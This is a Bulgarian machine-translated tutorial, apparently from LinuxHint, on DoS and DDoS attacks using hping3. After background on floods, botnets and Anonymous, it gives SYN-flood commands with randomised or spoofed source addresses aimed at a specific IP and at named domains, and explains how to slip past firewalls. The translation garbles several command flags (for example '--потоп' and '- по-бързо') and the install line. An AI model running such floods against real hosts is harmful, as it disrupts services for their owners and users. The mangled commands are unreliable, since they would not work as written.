Сигурност

hping3 наводнения ddos

hping3 наводнения ddos
Този урок се фокусира върху DDOS (разпределено отказване на услуга) атаки с помощта на инструмента hping3. Ако вече сте запознати с DOS (Denial of Service) и DDOS атаки, можете да продължите да четете от практическите инструкции на hping3, в противен случай се препоръчва да научите как работят тези атаки.

DOS атаки


Атаката за отказ на услуга (DOS) е много проста техника за отказване на достъп до услуги (затова се нарича атака „отказ на услуга“). Тази атака се състои в претоварване на целта с големи пакети или голямо количество от тях.

Въпреки че тази атака е много лесна за изпълнение, тя не компрометира информацията или поверителността на целта, тя не е проникваща атака и има за цел само да предотврати достъпа до целта.
Чрез изпращане на количество пакети целта не може да се справи с нападателите, за да попречи на сървъра да обслужва легитимни потребители.

DOS атаките се извършват от едно устройство, поради което е лесно да ги спрете, като блокирате IP на атакуващия, но атакуващият може да променя и дори да подправя (клонира) целевия IP адрес, но не е трудно за защитните стени да се справят с такива атаки , противно на това, което се случва с DDOS атаки.

DDOS атаки

Разпределената атака за отказ на услуга (DDOS) е подобна на DOS атака, но се извършва едновременно от различни възли (или различни нападатели). Обикновено DDOS атаките се извършват от ботнети. Ботнетите са автоматизирани скриптове или програми, които заразяват компютрите, за да изпълнят автоматизирана задача (в този случай DDOS атака). Хакерът може да създаде ботнет и да зарази много компютри, от които ботнетите ще стартират DOS атаки, фактът, че много ботнети стрелят едновременно, превръща DOS атаката в DDOS атака (затова се нарича „разпределена“).

Разбира се, има изключения, при които DDOS атаки са били извършени от истински нападатели на хора, например групата хакери Anonymous, интегрирана от хиляди хора по целия свят, е използвала тази техника много често поради нейното лесно изпълнение (изисква се само доброволци, които споделят каузата си), така например Аноним остави либийското правителство на Кадафи напълно разединено по време на инвазията, либийската държава остана беззащитна пред хиляди нападатели от цял ​​свят.

Този тип атаки, когато се извършват от много различни възли, е изключително трудно да се предотвратят и спрат и обикновено изискват специален хардуер за справяне, това е така, защото защитните стени и защитните приложения не са подготвени да се справят едновременно с хиляди нападатели. Това не е случаят с hping3, повечето атаки, извършени чрез този инструмент, ще бъдат блокирани от защитни устройства или софтуер, но е полезен в локални мрежи или срещу лошо защитени цели.

Относно hping3

Инструментът hping3 ви позволява да изпращате манипулирани пакети. Този инструмент ви позволява да контролирате размера, количеството и фрагментацията на пакетите, за да претоварите целта и да заобиколите или атакувате защитни стени. Hping3 може да бъде полезен за целите на сигурността или тестването на способности, като го използвате, можете да тествате ефективността на защитните стени и ако сървърът може да обработва голямо количество пакети. По-долу ще намерите инструкции как да използвате hping3 за целите на тестването на сигурността.

Първи стъпки с DDOS атаки с помощта на hping3:

На дистрибуциите на Debian и Linux можете да инсталирате hping3, като стартирате:

# apt инсталирайте hping3 -y

Една проста DOS (а не DDOS) атака би била:

# sudo hping3 -S --flood -V -p 80 170.155.9.185

Където:
sudo: дава необходимите привилегии за стартиране на hping3.
hping3:
извиква програма hping3.
-С: определя SYN пакети.
-наводнение: стреляйте по преценка, отговорите ще бъдат игнорирани (затова отговорите няма да се показват) и пакетите ще бъдат изпратени възможно най-бързо.
-V: Многословие.
-стр. 80: порт 80, можете да замените този номер за услугата, която искате да атакувате.
170.155.9.185: целеви IP.

Flood, използвайки SYN пакети срещу порт 80:

Следващият пример изобразява SYN атака срещу лакампора.org:

# sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-source

Където:
Лакампора.org: е целта
-q: кратък изход
-н: показва целевия IP вместо хост.
-d 120: задайте размер на пакета
-rand-source: скриване на IP адрес.

Следващият пример показва друг възможен пример за наводнение:

SYN наводнение срещу порт 80:

# sudo hping3 --rand-source ivan.com -S -q -p 80 --потоп

С hping3 можете също да атакувате целите си с фалшив IP, за да заобиколите защитната стена, можете дори да клонирате самия целеви IP или всеки разрешен адрес, който може да знаете (можете да го постигнете, например с Nmap или sniffer, за да слушате установен връзки).

Синтаксисът ще бъде:

# sudo hping3 -a -S -q -p 80 - по-бързо -c2

В този практически пример атаката изглежда:

# sudo hping3 -a 190.0.175.100 190.0.175.100 -S -q -p 80 - по-бързо -c2

Надявам се, че този урок за hping3 ви е бил полезен. Продължавайте да следвате LinuxHint за още съвети и актуализации за Linux и мрежи.

Топ 5 продукти за ергономична компютърна мишка за Linux
Продължителната употреба на компютър причинява ли болка в китката или пръстите? Страдате ли от схванати стави и постоянно ли ви се налага да си ръкува...
Как да променяте настройките на мишката и тъчпада с помощта на Xinput в Linux
Повечето дистрибуции на Linux се доставят с библиотека “libinput” по подразбиране за обработка на входни събития в системата. Той може да обработва вх...
Пренастройте бутоните на мишката си по различен начин за различен софтуер с X-Mouse Button Control
Може би се нуждаете от инструмент, който може да промени контрола на мишката с всяко приложение, което използвате. Ако случаят е такъв, можете да изпр...